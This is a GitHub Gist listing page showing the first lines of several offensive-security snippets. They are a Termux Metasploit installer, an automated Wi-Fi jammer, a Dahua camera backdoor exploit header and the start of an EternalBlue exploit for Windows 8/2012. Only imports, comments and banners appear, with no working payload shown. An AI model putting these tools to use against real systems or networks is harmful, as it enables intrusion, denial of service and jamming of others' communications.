Skip to content

Instantly share code, notes, and snippets.

@izidima
izidima / msf.sh
Created March 5, 2021 01:03 — forked from kuldeep1337/msf.sh
#!/data/data/com.termux/files/usr/bin/bash
echo "##############################################"
echo " I AM nobita"
echo "##############################################"
echo "WAIT UNTIL INSTALLING............"
echo "####################################"
apt install -y autoconf bison clang coreutils axel curl findutils git apr apr-util libffi-dev libgmp-dev libpcap-dev postgresql-dev readline-dev libsqlite-dev openssl-dev libtool libxml2-dev libxslt-dev ncurses-dev pkg-config wget make ruby-dev libgrpc-dev termux-tools ncurses-utils ncurses unzip zip tar postgresql termux-elf-cleaner
echo "####################################"
@izidima
izidima / auto_wifi_jammer.py
Created March 1, 2021 15:43
Automated Websploit Wifi Jammer
#!/usr/bin/env python
import re
import subprocess
import pexpect
import time
import sys
import atexit
def exitFunc():
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
import string
@izidima
izidima / eternalblue8_exploit.py
Created April 6, 2018 13:19 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://crowdshield.com